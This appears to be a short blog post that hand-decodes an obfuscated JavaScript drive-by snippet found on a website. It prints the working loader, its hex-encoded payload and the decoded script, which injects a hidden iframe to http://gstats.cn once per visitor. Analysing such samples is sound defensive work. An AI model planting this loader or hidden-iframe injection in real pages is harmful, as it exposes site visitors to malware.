
Twiddling with obfuscated JavaScript code

Today a friend of mine sent me a link to a blog at which my virus scanner went haywire: HTML/Crypt.Gen stuff, Trojan warning, etc.
After getting the scanner to actually let me see the source (…), I found this:

<script language="JavaScript" type="text/javascript">
B46F5DF="pars";B46F5DF+="eInt";D8FA33DFE494F="Stri";D8FA33DFE494F+="ng";D8FA33DFE494F+=".fr";D8FA33DFE494F+="om";D8FA33DFE494F+="CharCode";function A2E39329F3265(B5A87C40BB26CEA){var E46F3EB4=525;E46F3EB4=E46F3EB4-509;BD0AB=eval(B46F5DF+"(B5A87C40BB26CEA,E46F3EB4)");return(BD0AB);}function AFE763E61CEF(C4D8544E71077){var C58BCCF5D58E99C=982;C58BCCF5D58E99C=C58BCCF5D58E99C-980;var A04698CEC="";for(B3CA4BA50C=0;B3CA4BA50C<C4D8544E71077.length;B3CA4BA50C+=C58BCCF5D58E99C){A04698CEC+=( eval(D8FA33DFE494F+"(A2E39329F3265(C4D8544E71077.substr(B3CA4BA50C,C58BCCF5D58E99C)))"));}eval(A04698CEC);}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
</script>

I was now eager to find out what this does, so I started to de-obfuscate it by hand:

1. Adding linebreaks:

// Obfuscation layer: the names of the two built-ins the decoder needs are
// assembled from string fragments, so neither "parseInt" nor
// "String.fromCharCode" appears literally in the page source.
// Both variables are assigned without `var` and therefore become globals.
B46F5DF="pars";
B46F5DF+="eInt";           // -> "parseInt"
D8FA33DFE494F="Stri";
D8FA33DFE494F+="ng";
D8FA33DFE494F+=".fr";
D8FA33DFE494F+="om";
D8FA33DFE494F+="CharCode"; // -> "String.fromCharCode"
// Decodes one hexadecimal chunk to a number.
// The constant arithmetic (525 - 509) yields 16, the radix; the call is
// built as a string so that, at eval time, it reads "parseInt(<chunk>,16)"
// (B46F5DF is assembled from fragments into "parseInt"). Direct eval sees
// the function's locals, which is why the parameter and radix names resolve.
// BD0AB is assigned without `var`, so the last decoded value also leaks
// into the global scope.
function A2E39329F3265(B5A87C40BB26CEA){
    var E46F3EB4=525;
    E46F3EB4=E46F3EB4-509; // 16: the radix handed to parseInt
    BD0AB=eval(B46F5DF+"(B5A87C40BB26CEA,E46F3EB4)");
    return(BD0AB);
}

// Decoder/loader: takes a hex string, converts it two characters at a time
// into the corresponding character codes, and then eval()s the assembled
// text as JavaScript.
// The loop step (982 - 980) is 2, i.e. one encoded byte per iteration;
// D8FA33DFE494F is assembled from fragments into "String.fromCharCode".
// The loop index B3CA4BA50C is assigned without `var` and leaks to global scope.
function AFE763E61CEF(C4D8544E71077){
    var C58BCCF5D58E99C=982;
    C58BCCF5D58E99C=C58BCCF5D58E99C-980; // 2: width of one hex-encoded byte
    var A04698CEC="";                      // accumulates the decoded script text
    for(B3CA4BA50C=0;B3CA4BA50C<C4D8544E71077.length;B3CA4BA50C+=C58BCCF5D58E99C){
        // Each iteration appends one character: fromCharCode(parseInt(hexPair,16)).
        A04698CEC+=( eval(D8FA33DFE494F+"(A2E39329F3265(C4D8544E71077.substr(B3CA4BA50C,C58BCCF5D58E99C)))"));
    }
    eval(A04698CEC); // executes the decoded payload (its plain text is shown in step 3)
}

// Entry point of the sample: the argument is the hex-encoded payload (two hex
// digits per character). The decoder above turns it into the script listed in
// step 3 and eval()s it.
AFE763E61CEF("69662028646F63756D656E742E636F6F6B69652E736561726368282272746E78773D372229203D3D202D3129207B0A726A7061743D646F63756D656E742E676574456C656D656E744279496428277174697427293B696628726A7061743D3D6E756C6C297B646F63756D656E742E777269746528273C696672616D652069643D71746974207372633D687474703A2F2F6773746174732E636E207374796C653D646973706C61793A6E6F6E653E3C2F696672616D653E27293B7D0A646F63756D656E742E636F6F6B6965203D202272746E78773D373B657870697265733D53756E2C2030312D4465632D323031312030383A30303A303020474D543B706174683D2F223B7D");

2. Renaming the identifiers, removing the obfuscation:

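/**
 * Parses a hexadecimal string into a number (the author's rename of A2E39329F3265).
 *
 * The original assigned the result to BD0AB without `var`, creating an implicit
 * global (a ReferenceError in strict mode / ES modules). The value is only ever
 * consumed through the return value, so the global is dropped and the radix 16
 * is written out directly.
 *
 * @param {string} param1 - a string of hex digits, e.g. "69"
 * @returns {number} the decoded value (NaN for non-hex input, as parseInt returns)
 */
function hex2dec(param1){
    return parseInt(param1, 16);
}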

// Author's rename of AFE763E61CEF: hex-decodes param1 two characters at a
// time into a string and then executes that string with eval().
// NOTE: `i` is assigned without `var` and therefore leaks into the global scope.
function decodeAndEval(param1){
    var buffer="";                 // the decoded script text
    for(i=0;i<param1.length;i+=2){
        // one hex pair -> one character code -> one character
        buffer+=( String.fromCharCode(hex2dec(param1.substr(i,2))) );
    }
    eval(buffer); // runs the decoded payload; its plain text is listed in step 3
}

decodeAndEval("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");

3. Echoing the decoded string:

// Decoded payload. The cookie "rtnxw=7" serves as a marker: the iframe is only
// injected when the cookie is absent, and the cookie is then set with an expiry
// of 01-Dec-2011, so the injection runs once per visitor until that date.
if (document.cookie.search("rtnxw=7") == -1) {
// Inject a hidden (display:none) iframe pointing at http://gstats.cn, unless an
// element with id "qtit" already exists (prevents injecting twice on one page).
// rjpat is assigned without `var` and becomes a global.
rjpat=document.getElementById('qtit');if(rjpat==null){document.write('<iframe id=qtit src=http://gstats.cn style=display:none></iframe>');}
// Set the marker cookie for the whole site (path=/).
document.cookie = "rtnxw=7;expires=Sun, 01-Dec-2011 08:00:00 GMT;path=/";}

So this small piece of JavaScript opens a hidden iframe to some Chinese website, which is currently marked as offensive in my Firefox; the cookie check only makes sure the iframe is injected once per visitor. I like small riddles in the morning ;)
